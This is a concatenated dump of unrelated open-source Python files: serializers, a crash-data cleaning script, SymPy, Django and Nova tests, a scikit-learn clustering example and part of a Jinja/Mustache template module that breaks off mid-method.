        # explicit write_only=True on `password` above is what takes
        # effect -- confirm against the installed DRF version.
        write_only_fields = (
            'password',
        )
class UserSerializer(serializers.ModelSerializer):
    """User profile serializer with a derived list of organization roles."""
    password = serializers.CharField(write_only=True, required=False)
    organization_roles = serializers.SerializerMethodField()

    def get_organization_roles(self, obj):
        """Return [{role, organization_id, organization_name}, ...] for
        every organization the user edits or belongs to."""
        editor_list = list(obj.editor.all())
        # A user may be both member and editor. As editor status supersedes
        # member status, if they are editor, we filter out the membership
        membership_list = list(filter(lambda x: x not in editor_list,
                                      obj.organization_set.all()))
        return list(
            [
                {
                    'role': 'editor',
                    'organization_id': o.id,
                    'organization_name': o.name
                }
                for o in editor_list
            ] + [
                {
                    'role': 'member',
                    'organization_id': o.id,
                    'organization_name': o.name
                }
                for o in membership_list
            ]
        )

    class Meta:
        model = User
        fields = (
            'id',
            'email',
            'first_name',
            'last_name',
            'date_joined',
            'is_staff',
            'date_of_birth',
            'phone_number',
            'organization_roles',
            'password'
        )
        read_only_fields = (
            'id',
            'email',
            'is_staff',
            'date_joined',
        )
class CategorySerializer(serializers.ModelSerializer):
    """Category plus a count of its publicly visible videos."""
    videocount = serializers.SerializerMethodField('count_videos')

    def count_videos(self, category):
        # Only publicly visible videos are counted.
        return (Video.objects
                .public()
                .filter(categories=category)
                .count())

    class Meta:
        model = Category
        fields = (
            'id',
            'name',
            'desc',
            'videocount',
        )
| lgpl-3.0 |
NYU-CS6313-Projects/Charts-for-CompStat | data/crash_cleaner.py | 1 | 3650 | #!/user/bin/python
# this python script cleans raw crash data and subsets the last n days of observations
# if n=-1 all rows of the raw dataset are kept
# WEEK and YEAR attributes are derived
import pandas as pd
import numpy as np
import datetime as dt
import re
import os
import logging
dpath = './'
def date_parser(ds):
    """Parse an 'MM/DD/YYYY' string to a ``datetime.date``.

    Non-string values (e.g. NaN cells from pandas) map to ``np.nan``.
    """
    # isinstance instead of type(...) == str: idiomatic and subclass-safe.
    if isinstance(ds, str):
        return dt.datetime.strptime(ds, "%m/%d/%Y").date()
    return np.nan
def time_parser(ts):
    """Parse an 'HH:MM' string to a ``datetime.time``.

    Non-string values (e.g. NaN cells from pandas) map to ``np.nan``.
    """
    if isinstance(ts, str):
        return dt.datetime.strptime(ts, "%H:%M").time()
    return np.nan
# ZIP handling by brigitte.jellinek@nyu.edu
def zip_cleaner(s):
    """Normalize a ZIP code string to its 5-digit form.

    '12345' passes through, '12345-1234' is truncated to '12345', and
    anything else (non-strings, short/garbage values) becomes ``np.nan``.
    """
    if not isinstance(s, str):
        return np.nan
    if re.match(r'^\d{5}$', s):
        return s
    if re.match(r'^\d{5}-\d*$', s):
        # Keep only the leading 5 digits; the match guarantees they exist.
        return s[:5]
    return np.nan
def test_zip_cleaner():
    """Spot-check zip_cleaner on valid, ZIP+4, and garbage inputs."""
    assert '12345' == zip_cleaner('12345')
    assert '12345' == zip_cleaner('12345-1234')
    assert np.isnan(zip_cleaner(np.nan))
    assert np.isnan(zip_cleaner('1234'))
    assert np.isnan(zip_cleaner('0'))
    assert np.isnan(zip_cleaner('UNKNOWN'))
# reads the raw crash data
def read_crash_csv(data):
    """Load a raw NYPD crash CSV and derive cleaned columns.

    Parses DATE/TIME, normalizes ZIP CODE, builds a (lat, lon) LOCATION
    tuple, derives WEEK and YEAR, and replaces spaces in column names
    with underscores.

    :param data: path or file-like object accepted by ``pd.read_csv``.
    :return: cleaned DataFrame.
    """
    df = pd.read_csv(data,
                     dtype={
                         'DATE': str,
                         'TIME': str,
                         'BOROUGH': str,
                         'ZIP CODE': str,
                         'LATITUDE': np.floating,
                         'LONGITUDE': np.floating,
                         'LOCATION': str,  # derived type
                         'ON STREET NAME': str,
                         'CROSS STREET NAME': str,
                         'OFF STREET NAME': str,
                         'NUMBER OF PERSONS INJURED': np.integer,
                         'NUMBER OF PERSONS KILLED': np.integer,
                         'NUMBER OF PEDESTRIANS INJURED': np.integer,
                         'NUMBER OF PEDESTRIANS KILLED': np.integer,
                         'NUMBER OF CYCLIST INJURED': np.integer,
                         'NUMBER OF CYCLIST KILLED': np.integer,
                         'NUMBER OF MOTORIST INJURED': np.integer,
                         'NUMBER OF MOTORIST KILLED': np.integer,
                         'CONTRIBUTING FACTOR VEHICLE 1': str,
                         'CONTRIBUTING FACTOR VEHICLE 2': str,
                         'CONTRIBUTING FACTOR VEHICLE 3': str,
                         'CONTRIBUTING FACTOR VEHICLE 4': str,
                         'CONTRIBUTING FACTOR VEHICLE 5': str,
                         'UNIQUE KEY': np.integer,
                         'VEHICLE TYPE CODE 1': str,
                         'VEHICLE TYPE CODE 2': str,
                         'VEHICLE TYPE CODE 3': str,
                         'VEHICLE TYPE CODE 4': str,
                         'VEHICLE TYPE CODE 5': str})
    # Use Series.map rather than the builtin map(): on Python 3 map()
    # returns a lazy iterator, which pandas would not assign correctly.
    df['DATE'] = df['DATE'].map(date_parser)
    df['TIME'] = df['TIME'].map(time_parser)
    # Materialize the zip so the column gets concrete tuples on Python 3.
    df['LOCATION'] = list(zip(df.LATITUDE, df.LONGITUDE))
    df['ZIP CODE'] = df['ZIP CODE'].map(zip_cleaner)
    df['WEEK'] = df['DATE'].apply(lambda x: pd.to_datetime(x).week)
    df['YEAR'] = df['DATE'].apply(lambda x: pd.to_datetime(x).year)
    # Underscored column names are easier to use as attributes.
    df.columns = [field.replace(" ", "_") for field in df.columns]
    return df
# subsets the last n days of the crash data and logs record counts;
# no subsetting is done when n == -1
def sample_crash_data(n, path, folder):
    """Write a cleaned subset of ``crashdata.csv`` next to the source file.

    :param n: number of trailing days to keep; -1 keeps every row.
    :param path: directory containing ``crashdata.csv`` and the log file.
    :param folder: unused in this function body -- presumably kept for
        call-site compatibility; TODO confirm and drop.
    """
    df = read_crash_csv(os.path.join(path, 'crashdata.csv'))
    logging.basicConfig(filename=os.path.join(path, 'sample.log'),
                        level=logging.DEBUG)
    df_new = df
    if n != -1:
        start = dt.date.today()
        # NOTE: %H:%M:%S on a date renders 00:00:00.
        logging.info('As for %s raw data set contains %s records ...'
                     % (dt.datetime.strftime(start, "%m/%d/%Y %H:%M:%S"),
                        df.shape[0]))
        end = dt.date.today() - dt.timedelta(days=n)
        # Keep rows within the [end, start] date window.
        df_new = df[(df.DATE >= end) & (df.DATE <= start)]
        df_new.to_csv(os.path.join(path, '%sdays_crashdata.csv' % (n)),
                      index=False)
        logging.info('Raw data set for the last %s days contains %s records'
                     % (n, df_new.shape[0]))
    else:
        df_new.to_csv(os.path.join(path, '%srows_crashdata.csv'
                                   % (df_new.shape[0])), index=False)
# n = 150 keeps the last 150 days; n = -1 keeps every row.
if __name__ == "__main__":
    sample_crash_data(150, dpath, 'data')
    sample_crash_data(-1, dpath, 'data')
| mit |
skidzo/sympy | sympy/core/tests/test_diff.py | 115 | 2793 | from sympy import Symbol, Rational, cos, sin, tan, cot, exp, log, Function, \
Derivative, Expr, symbols, pi, I, S
from sympy.utilities.pytest import raises
def test_diff():
    """Basic differentiation rules plus diff() argument validation."""
    x, y = symbols('x, y')
    # Constants differentiate to zero; zeroth derivative is the identity.
    assert Rational(1, 3).diff(x) is S.Zero
    assert I.diff(x) is S.Zero
    assert pi.diff(x) is S.Zero
    assert x.diff(x, 0) == x
    assert (x**2).diff(x, 2, x) == 0
    assert (x**2).diff(x, y, 0) == 2*x
    assert (x**2).diff(x, y) == 0
    # A non-symbol differentiation variable is rejected.
    raises(ValueError, lambda: x.diff(1, x))
    a = Symbol("a")
    b = Symbol("b")
    c = Symbol("c")
    p = Rational(5)
    e = a*b + b**p
    assert e.diff(a) == b
    assert e.diff(b) == a + 5*b**4
    assert e.diff(b).diff(a) == Rational(1)
    e = a*(b + c)
    assert e.diff(a) == b + c
    assert e.diff(b) == a
    assert e.diff(b).diff(a) == Rational(1)
    e = c**p
    # Differentiating past the polynomial degree yields zero.
    assert e.diff(c, 6) == Rational(0)
    assert e.diff(c, 5) == Rational(120)
    e = c**Rational(2)
    assert e.diff(c) == 2*c
    e = a*b*c
    assert e.diff(c) == a*b
def test_diff2():
    """Product-rule results on trig expressions and powers."""
    n3 = Rational(3)
    n2 = Rational(2)
    n6 = Rational(6)
    x, c = map(Symbol, 'xc')
    e = n3*(-n2 + x**n2)*cos(x) + x*(-n6 + x**n2)*sin(x)
    assert e == 3*(-2 + x**2)*cos(x) + x*(-6 + x**2)*sin(x)
    # The derivative collapses to a single term after expansion.
    assert e.diff(x).expand() == x**3*cos(x)
    e = (x + 1)**3
    assert e.diff(x) == 3*(x + 1)**2
    e = x*(x + 1)**3
    assert e.diff(x) == (x + 1)**3 + 3*x*(x + 1)**2
    e = 2*exp(x*x)*x
    assert e.diff(x) == 2*exp(x**2) + 4*x**2*exp(x**2)
def test_diff3():
    """Chain rule through trig, log and exponential functions."""
    a, b, c = map(Symbol, 'abc')
    p = Rational(5)
    e = a*b + sin(b**p)
    assert e == a*b + sin(b**5)
    assert e.diff(a) == b
    assert e.diff(b) == a + 5*b**4*cos(b**5)
    e = tan(c)
    assert e == tan(c)
    # Any of the equivalent forms of tan' is acceptable.
    assert e.diff(c) in [cos(c)**(-2), 1 + sin(c)**2/cos(c)**2, 1 + tan(c)**2]
    e = c*log(c) - c
    assert e == -c + c*log(c)
    assert e.diff(c) == log(c)
    e = log(sin(c))
    assert e == log(sin(c))
    assert e.diff(c) in [sin(c)**(-1)*cos(c), cot(c)]
    e = (Rational(2)**a/log(Rational(2)))
    assert e == 2**a*log(Rational(2))**(-1)
    assert e.diff(a) == 2**a
def test_diff_no_eval_derivative():
    """Expr subclasses without _eval_derivative stay as Derivative objects,
    except when the variable is absent (derivative is zero)."""
    class My(Expr):
        def __new__(cls, x):
            return Expr.__new__(cls, x)
    x, y = symbols('x y')
    # My doesn't have its own _eval_derivative method
    assert My(x).diff(x).func is Derivative
    # it doesn't have y so it shouldn't need a method for this case
    assert My(x).diff(y) == 0
def test_speed():
    """A huge derivative order of a linear term must short-circuit to 0."""
    # this should return in 0.0s. If it takes forever, it's wrong.
    x = Symbol("x")
    assert x.diff(x, 10**8) == 0
def test_deriv_noncommutative():
    """Differentiation preserves ordering of noncommutative factors."""
    A = Symbol("A", commutative=False)
    f = Function("f")
    x = Symbol("x")
    assert A*f(x)*A == f(x)*A**2
    assert A*f(x).diff(x)*A == f(x).diff(x) * A**2
| bsd-3-clause |
tannishk/airmozilla | airmozilla/manage/tests/views/test_permissions.py | 6 | 3637 | from nose.tools import eq_
import mock
from django.conf import settings
from django.contrib.auth.models import User, Group, Permission
from funfactory.urlresolvers import reverse
from airmozilla.main.models import UserProfile, Event, CuratedGroup
from airmozilla.base.tests.test_mozillians import Response, IN_GROUPS
from .base import ManageTestCase
class TestPermissions(ManageTestCase):
    """Access control for the manage dashboard and event editing."""

    def test_unauthorized(self):
        """ Client with no log in - should be rejected. """
        self.client.logout()
        response = self.client.get(reverse('manage:dashboard'))
        self.assertRedirects(response, settings.LOGIN_URL
                             + '?next=' + reverse('manage:dashboard'))

    def test_not_staff(self):
        """ User is not staff - should be rejected. """
        self.user.is_staff = False
        self.user.save()
        response = self.client.get(reverse('manage:dashboard'))
        self.assertRedirects(response, settings.LOGIN_URL
                             + '?next=' + reverse('manage:dashboard'))

    def test_staff_home(self):
        """ User is staff - should get an OK homepage. """
        response = self.client.get(reverse('manage:dashboard'))
        eq_(response.status_code, 200)

    @mock.patch('requests.get')
    def test_editing_events_with_curated_groups(self, rget):
        """A contributor producer can edit an event only when its privacy
        and curated groups allow it."""
        def mocked_get(url, **options):
            # Mozillians API lookups for this user return group membership.
            if 'peterbe' in url:
                # Removed a stray debug `print` statement here.
                return Response(IN_GROUPS)
            raise NotImplementedError(url)

        rget.side_effect = mocked_get

        self.client.logout()
        assert self.client.get(reverse('manage:dashboard')).status_code == 302

        # now log in as a contributor
        contributor = User.objects.create_user(
            'peter', 'peterbe@gmail.com', 'secret'
        )
        producers = Group.objects.create(name='Producer')
        change_event_permission = Permission.objects.get(
            codename='change_event'
        )
        change_event_others_permission = Permission.objects.get(
            codename='change_event_others'
        )
        producers.permissions.add(change_event_permission)
        producers.permissions.add(change_event_others_permission)
        contributor.groups.add(producers)
        contributor.is_staff = True
        contributor.save()
        UserProfile.objects.create(
            user=contributor,
            contributor=True
        )
        assert self.client.login(username='peter', password='secret')
        event = Event.objects.get(title='Test event')
        assert event.privacy == Event.PRIVACY_PUBLIC
        url = reverse('manage:event_edit', args=(event.id,))
        response = self.client.get(url)
        eq_(response.status_code, 200)

        # the contributor producer can't view it if it's private
        event.privacy = Event.PRIVACY_COMPANY
        event.save()
        response = self.client.get(url)
        eq_(response.status_code, 302)

        # but it's ok if it's for contributors
        event.privacy = Event.PRIVACY_CONTRIBUTORS
        event.save()
        response = self.client.get(url)
        eq_(response.status_code, 200)

        # but not if the event is only open to certain curated groups
        curated_group = CuratedGroup.objects.create(
            event=event,
            name='badasses'
        )
        response = self.client.get(url)
        eq_(response.status_code, 302)

        # member of a matching curated group regains access
        curated_group.delete()
        CuratedGroup.objects.create(
            event=event,
            name='swedes'
        )
        response = self.client.get(url)
        eq_(response.status_code, 200)
| bsd-3-clause |
bitcity/django | tests/gis_tests/maps/tests.py | 322 | 2099 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from unittest import skipUnless
from django.contrib.gis.geos import HAS_GEOS
from django.test import SimpleTestCase
from django.test.utils import modify_settings, override_settings
from django.utils.encoding import force_text
GOOGLE_MAPS_API_KEY = 'XXXX'
@skipUnless(HAS_GEOS, 'Geos is required.')
@modify_settings(
    INSTALLED_APPS={'append': 'django.contrib.gis'},
)
class GoogleMapsTest(SimpleTestCase):
    """Smoke tests for the deprecated django.contrib.gis Google Maps helpers."""

    @override_settings(GOOGLE_MAPS_API_KEY=GOOGLE_MAPS_API_KEY)
    def test_google_map_scripts(self):
        """
        Testing GoogleMap.scripts() output. See #20773.
        """
        from django.contrib.gis.maps.google.gmap import GoogleMap

        google_map = GoogleMap()
        scripts = google_map.scripts
        # The configured API key and the GMap2 constructor must both
        # appear in the generated script block.
        self.assertIn(GOOGLE_MAPS_API_KEY, scripts)
        self.assertIn("new GMap2", scripts)

    @override_settings(GOOGLE_MAPS_API_KEY=GOOGLE_MAPS_API_KEY)
    def test_unicode_in_google_maps(self):
        """
        Test that GoogleMap doesn't crash with non-ASCII content.
        """
        from django.contrib.gis.geos import Point
        from django.contrib.gis.maps.google.gmap import GoogleMap, GMarker

        center = Point(6.146805, 46.227574)
        marker = GMarker(center,
                         title='En français !')
        google_map = GoogleMap(center=center, zoom=18, markers=[marker])
        self.assertIn("En français", google_map.scripts)

    def test_gevent_html_safe(self):
        # GEvent must participate in Django's html-safe protocol.
        from django.contrib.gis.maps.google.overlays import GEvent
        event = GEvent('click', 'function() {location.href = "http://www.google.com"}')
        self.assertTrue(hasattr(GEvent, '__html__'))
        self.assertEqual(force_text(event), event.__html__())

    def test_goverlay_html_safe(self):
        # Same html-safe check for the overlay base class.
        from django.contrib.gis.maps.google.overlays import GOverlayBase
        overlay = GOverlayBase()
        overlay.js_params = '"foo", "bar"'
        self.assertTrue(hasattr(GOverlayBase, '__html__'))
        self.assertEqual(force_text(overlay), overlay.__html__())
| bsd-3-clause |
tangfeixiong/nova | nova/tests/unit/virt/ironic/utils.py | 42 | 4038 | # Copyright 2014 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova import objects
from nova.virt.ironic import ironic_states
def get_test_validation(**kw):
    """Build a fake Ironic driver-interface validation result.

    Each interface flag (power, deploy, console, rescue) defaults to True
    and can be overridden through keyword arguments.
    """
    interface_names = ('power', 'deploy', 'console', 'rescue')
    attrs = dict((name, kw.get(name, True)) for name in interface_names)
    # An anonymous object whose attributes mirror ironicclient's result.
    return type('interfaces', (object,), attrs)()
def get_test_node(**kw):
    """Build a fake Ironic node object for tests.

    Every attribute can be overridden via keyword arguments; the various
    power/provision states default to ironic_states.NOSTATE.
    """
    return type('node', (object,),
                {'uuid': kw.get('uuid', 'eeeeeeee-dddd-cccc-bbbb-aaaaaaaaaaaa'),
                 'chassis_uuid': kw.get('chassis_uuid'),
                 'power_state': kw.get('power_state',
                                       ironic_states.NOSTATE),
                 'target_power_state': kw.get('target_power_state',
                                              ironic_states.NOSTATE),
                 'provision_state': kw.get('provision_state',
                                           ironic_states.NOSTATE),
                 'target_provision_state': kw.get('target_provision_state',
                                                  ironic_states.NOSTATE),
                 'last_error': kw.get('last_error'),
                 'instance_uuid': kw.get('instance_uuid'),
                 'driver': kw.get('driver', 'fake'),
                 'driver_info': kw.get('driver_info', {}),
                 'properties': kw.get('properties', {}),
                 'reservation': kw.get('reservation'),
                 'maintenance': kw.get('maintenance', False),
                 'extra': kw.get('extra', {}),
                 # Bug fix: these two lookups were cross-wired (the
                 # 'updated_at' attribute read kw['created_at'] and vice
                 # versa), unlike get_test_port() below which is correct.
                 'updated_at': kw.get('updated_at'),
                 'created_at': kw.get('created_at')})()
def get_test_port(**kw):
    """Build a fake Ironic port object; node_uuid defaults to a fresh
    get_test_node()'s uuid."""
    attrs = {
        'uuid': kw.get('uuid', 'gggggggg-uuuu-qqqq-ffff-llllllllllll'),
        'node_uuid': kw.get('node_uuid', get_test_node().uuid),
        'address': kw.get('address', 'FF:FF:FF:FF:FF:FF'),
        'extra': kw.get('extra', {}),
        'created_at': kw.get('created_at'),
        'updated_at': kw.get('updated_at'),
    }
    return type('port', (object,), attrs)()
def get_test_flavor(**kw):
    """Build a nova Flavor object whose extra specs point at fake
    baremetal deploy kernel/ramdisk images."""
    default_extra_specs = {
        'baremetal:deploy_kernel_id':
            'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa',
        'baremetal:deploy_ramdisk_id':
            'bbbbbbbb-bbbb-bbbb-bbbb-bbbbbbbbbbbb',
    }
    return objects.Flavor(
        name=kw.get('name', 'fake.flavor'),
        extra_specs=kw.get('extra_specs', default_extra_specs),
        swap=kw.get('swap', 0),
        ephemeral_gb=kw.get('ephemeral_gb', 0))
def get_test_image_meta(**kw):
    """Return a minimal Glance-style image metadata dict (id only)."""
    image_id = kw.get('id', 'cccccccc-cccc-cccc-cccc-cccccccccccc')
    return {'id': image_id}
class FakePortClient(object):
    """No-op stand-in for ironicclient's port manager; tests patch these
    methods or assert on how they were called."""
    def get(self, port_uuid):
        pass
    def update(self, port_uuid, patch):
        pass
class FakeNodeClient(object):
    """No-op stand-in for ironicclient's node manager."""
    def list(self, detail=False):
        # Report an empty deployment by default.
        return []
    def get(self, node_uuid):
        pass
    def get_by_instance_uuid(self, instance_uuid):
        pass
    def list_ports(self, node_uuid):
        pass
    def set_power_state(self, node_uuid, target):
        pass
    def set_provision_state(self, node_uuid, target):
        pass
    def update(self, node_uuid, patch):
        pass
    def validate(self, node_uuid):
        pass
class FakeClient(object):
    """Minimal ironicclient.Client replacement exposing node/port managers."""
    # Shared class-level managers are fine here: the fakes hold no state.
    node = FakeNodeClient()
    port = FakePortClient()
| apache-2.0 |
annapowellsmith/openpresc | openprescribing/frontend/tests/commands/test_generate_presentation_replacements.py | 1 | 4653 | from django.core.management import call_command
from django.test import TestCase
from frontend.models import Chemical
from frontend.models import Presentation
from frontend.models import Product
from frontend.models import Section
from mock import patch
@patch('frontend.management.commands.generate_presentation_replacements'
       '.cleanup_empty_classes')
@patch('frontend.management.commands.generate_presentation_replacements'
       '.create_bigquery_table')
@patch('pipeline.management.commands.create_normalised_prescribing_view'
       '.Command.handle')
class CommandsTestCase(TestCase):
    """Tests for the generate_presentation_replacements command, with the
    BigQuery/view side effects mocked out."""

    def setUp(self):
        # BNF sections: two subsections and two paragraphs.
        for bnf_id, name in [('0000', 'Subsection 0.0'),
                             ('9999', 'Subsection 9.9'),
                             ('777777', 'Para 7.7.7'),
                             ('222222', 'Para 2.2.2')]:
            Section.objects.create(bnf_id=bnf_id,
                                   name=name,
                                   bnf_chapter=0,
                                   bnf_section=0,
                                   bnf_para=0)
        for bnf_code, chem_name in [('ZZZZZZZZZ', 'Chemical Z'),
                                    ('YYYYYYYYY', 'Chemical Y'),
                                    ('111111111', 'Chemical 1')]:
            Chemical.objects.create(bnf_code=bnf_code, chem_name=chem_name)
        for bnf_code, name in [('33333333333', 'Product 3'),
                               ('44444444444', 'Product 4')]:
            Product.objects.create(bnf_code=bnf_code, name=name)
        for bnf_code, name in [('MMMMMMMMMMMMMMM', 'Drug M'),
                               ('999999999999999', 'Drug 9'),
                               ('ZZZZZZZZZZZZZZZ', 'Drug Z')]:
            Presentation.objects.create(bnf_code=bnf_code, name=name)
        fixtures_dir = 'frontend/tests/fixtures/commands/'
        self.args = [
            fixtures_dir + 'presentation_replacements_2017.txt',
            fixtures_dir + 'presentation_replacements_2016.txt']
        self.opts = {}

    def test_replacements(
            self,
            mock_cleanup_empty_classes,
            mock_create_bigquery_table,
            mock_handle):
        call_command(
            'generate_presentation_replacements', *self.args, **self.opts)
        # A simple one-step replacement.
        replaced = Presentation.objects.get(bnf_code='YYYYYYYYYYYYYYY')
        self.assertEqual(replaced.replaced_by.bnf_code, 'ZZZZZZZZZZZZZZZ')
        self.assertEqual(replaced.current_version.bnf_code, 'ZZZZZZZZZZZZZZZ')
        # A two-step replacement that also crosses a section boundary.
        moved = Presentation.objects.get(bnf_code='777777777777777')
        self.assertEqual(moved.current_version.bnf_code, '999999999999999')
        # A replacement loop must resolve to the presentation itself.
        looped = Presentation.objects.get(bnf_code='MMMMMMMMMMMMMMM')
        self.assertEqual(looped.current_version.bnf_code, 'MMMMMMMMMMMMMMM')

    def test_chemical_currency(
            self,
            mock_cleanup_empty_classes,
            mock_create_bigquery_table,
            mock_handle):
        call_command(
            'generate_presentation_replacements', *self.args, **self.opts)
        # (model, pk, expected is_current) triples covering chemicals,
        # subsections, paragraphs and products.
        expectations = [
            (Chemical, 'YYYYYYYYY', False),
            (Chemical, 'ZZZZZZZZZ', True),
            (Chemical, '111111111', True),
            # Subsection
            (Section, '0000', False),
            (Section, '9999', True),
            # Paragraph
            (Section, '777777', False),
            (Section, '222222', True),
            # Products
            (Product, '44444444444', False),
            (Product, '33333333333', True),
        ]
        for model, pk, expected in expectations:
            self.assertEqual(model.objects.get(pk=pk).is_current, expected)
| mit |
hsuantien/scikit-learn | examples/cluster/plot_agglomerative_clustering_metrics.py | 402 | 4492 | """
Agglomerative clustering with different metrics
===============================================
Demonstrates the effect of different metrics on the hierarchical clustering.
The example is engineered to show the effect of the choice of different
metrics. It is applied to waveforms, which can be seen as
high-dimensional vector. Indeed, the difference between metrics is
usually more pronounced in high dimension (in particular for euclidean
and cityblock).
We generate data from three groups of waveforms. Two of the waveforms
(waveform 1 and waveform 2) are proportional one to the other. The cosine
distance is invariant to a scaling of the data, as a result, it cannot
distinguish these two waveforms. Thus even with no noise, clustering
using this distance will not separate out waveform 1 and 2.
We add observation noise to these waveforms. We generate very sparse
noise: only 6% of the time points contain noise. As a result, the
l1 norm of this noise (ie "cityblock" distance) is much smaller than its
l2 norm ("euclidean" distance). This can be seen on the inter-class
distance matrices: the values on the diagonal, that characterize the
spread of the class, are much bigger for the Euclidean distance than for
the cityblock distance.
When we apply clustering to the data, we find that the clustering
reflects what was in the distance matrices. Indeed, for the Euclidean
distance, the classes are ill-separated because of the noise, and thus
the clustering does not separate the waveforms. For the cityblock
distance, the separation is good and the waveform classes are recovered.
Finally, the cosine distance does not separate waveforms 1 and 2 at all,
thus the clustering puts them in the same cluster.
"""
# Author: Gael Varoquaux
# License: BSD 3-Clause or CC-0
import matplotlib.pyplot as plt
import numpy as np
from sklearn.cluster import AgglomerativeClustering
from sklearn.metrics import pairwise_distances
# Fix the RNG seed so the generated waveforms (and plots) are reproducible.
np.random.seed(0)
# Generate waveform data
n_features = 2000  # number of time points per waveform
# Time axis: n_features samples evenly spaced over [0, pi].
t = np.pi * np.linspace(0, 1, n_features)
def sqr(x):
    """Square wave: the sign of cos(x) (+1/-1, and 0 at zero crossings)."""
    cosine = np.cos(x)
    return np.sign(cosine)
X = list()
y = list()
# Three waveform classes; (phi, a) = (phase offset, amplitude). Classes 1
# and 2 share the same phase and differ only by scale, which the cosine
# metric cannot distinguish.
for i, (phi, a) in enumerate([(.5, .15), (.5, .6), (.3, .2)]):
    # 30 noisy observations per class.
    for _ in range(30):
        phase_noise = .01 * np.random.normal()
        amplitude_noise = .04 * np.random.normal()
        additional_noise = 1 - 2 * np.random.rand(n_features)
        # Make the noise sparse
        additional_noise[np.abs(additional_noise) < .997] = 0
        X.append(12 * ((a + amplitude_noise)
                 * (sqr(6 * (t + phi + phase_noise)))
                 + additional_noise))
        y.append(i)
X = np.array(X)
y = np.array(y)
n_clusters = 3
labels = ('Waveform 1', 'Waveform 2', 'Waveform 3')
# Plot the ground-truth labelling
plt.figure()
plt.axes([0, 0, 1, 1])
# One color per true class; label only the first line of each class so the
# legend shows a single entry per waveform.
for l, c, n in zip(range(n_clusters), 'rgb',
                   labels):
    lines = plt.plot(X[y == l].T, c=c, alpha=.5)
    lines[0].set_label(n)
plt.legend(loc='best')
plt.axis('tight')
plt.axis('off')
plt.suptitle("Ground truth", size=20)
# Plot the distances
# (The index produced by the original enumerate() was unused, so iterate
# over the metrics directly.)
for metric in ["cosine", "euclidean", "cityblock"]:
    avg_dist = np.zeros((n_clusters, n_clusters))
    plt.figure(figsize=(5, 4.5))
    # Mean pairwise distance between every pair of classes (i, j).
    for i in range(n_clusters):
        for j in range(n_clusters):
            avg_dist[i, j] = pairwise_distances(X[y == i], X[y == j],
                                                metric=metric).mean()
    avg_dist /= avg_dist.max()
    # Annotate each cell with its normalized distance.
    for i in range(n_clusters):
        for j in range(n_clusters):
            plt.text(i, j, '%5.3f' % avg_dist[i, j],
                     verticalalignment='center',
                     horizontalalignment='center')
    plt.imshow(avg_dist, interpolation='nearest', cmap=plt.cm.gnuplot2,
               vmin=0)
    plt.xticks(range(n_clusters), labels, rotation=45)
    plt.yticks(range(n_clusters), labels)
    plt.colorbar()
    plt.suptitle("Interclass %s distances" % metric, size=18)
    plt.tight_layout()
# Plot clustering results
# (The index produced by the original enumerate() was unused, so iterate
# over the metrics directly.)
for metric in ["cosine", "euclidean", "cityblock"]:
    # Average-linkage agglomerative clustering under the given affinity.
    model = AgglomerativeClustering(n_clusters=n_clusters,
                                    linkage="average", affinity=metric)
    model.fit(X)
    plt.figure()
    plt.axes([0, 0, 1, 1])
    for l, c in zip(np.arange(model.n_clusters), 'rgbk'):
        plt.plot(X[model.labels_ == l].T, c=c, alpha=.5)
    plt.axis('tight')
    plt.axis('off')
    plt.suptitle("AgglomerativeClustering(affinity=%s)" % metric, size=20)
plt.show()
| bsd-3-clause |
JoshAshby/seshat_addons | seshat_addons/view/template.py | 1 | 9852 | #!/usr/bin/env python
"""
TEMPLATE ALL THE THINGS WITH Jinja (And Mustache)!!!!
Uses the Jinja templating language to make a base template object by which is
easy to work with in the controllers, and a walker and templateFile objects
which provide automatic reading and rereading in debug mode of template files.
For more information, see: https://github.com/JoshAshby/
http://xkcd.com/353/
Josh Ashby
2014
http://joshashby.com
joshuaashby@joshashby.com
"""
import pystache
import logging
import codecs
import jinja2
import arrow
import copy
import yaml
import os
import re
# Module-wide logger for template loading/rendering diagnostics.
logger = logging.getLogger("seshat.views")
# When True, templates are re-read from disk whenever they change (debug mode).
dynamic_reloading = False
# Directory that all template paths are resolved against.
templates_base = "views/"
# Arrow format string used when logging file modification times.
time_format = "dd MMM DD HH:mm:ss:SS YYYY"
# Delimiter fencing an optional YAML config block at the top of a template.
config_delim = "+++"
# Fallback theme color injected when neither template nor data provides one.
default_theme_color = "green"
# Inline partial include syntax: ![[path/to/partial]]
partial_syntax_regex = r'(\!\[{2}(?:.*?)\]{2})'
# Registry of all parsed templateFile objects, keyed by path (sans extension).
tmpls = {}
partial_re = re.compile(partial_syntax_regex)
# Flipped to True once read_in_templates() has loaded every template file.
partials_ready = False
class templateFile(object):
    """One template on disk.

    Parses an optional `+++`-fenced YAML config header, resolves
    `![[...]]` partial includes against the global `tmpls` registry, and
    renders via Jinja2 or Mustache depending on the file's extension.
    """
    def __init__(self, fileBit):
        """
        Reads in fileBit into memory, and sets the modified time for the
        object to that of the file at the current moment.
        """
        self._file_bit = fileBit
        self._file = ''.join([templates_base, fileBit])
        # 0 forces the first _read_template() to always load the file.
        self._mtime = 0
        self._config = {}
        self._read_template()
    def _read_template(self):
        """
        Read in the template only if it has been modified since we first
        read it into our `_template`
        """
        mtime = os.path.getmtime(self._file)
        nt = arrow.get(mtime).format(time_format)
        logger.debug("""\n\r============== Template =================
  Reading template into memory...
  TEMPLATE: %s
  TYPE: %s
  MTIME: %s
""" % (self._file, self.extension, nt))
        with codecs.open(self._file, "r", "utf-8") as openTmpl:
            raw = unicode(openTmpl.read())
        self._mtime = mtime
        self._parse_raw(raw)
    def _parse_raw(self, raw):
        # Split off the optional `+++ ... +++` YAML config header; whatever
        # follows it is the actual template body.
        if raw[:3] == config_delim:
            config, template = raw.split(config_delim, 2)[1:]
            self._config = yaml.load(config)
        else:
            self._config = {}
            template = raw
        self._raw_template = template
    def _raw_to_engine(self, raw):
        # Mustache renders from the raw string; Jinja needs a compiled object.
        if(self.is_mustache):
            self._engine_template = raw
        if(self.is_jinja):
            self._engine_template = jinja2.Template(raw)
    def _parse_partials(self):
        """Find all ![[...]] includes; returns (any_partial_updated, matches)."""
        updated = False
        partials = []
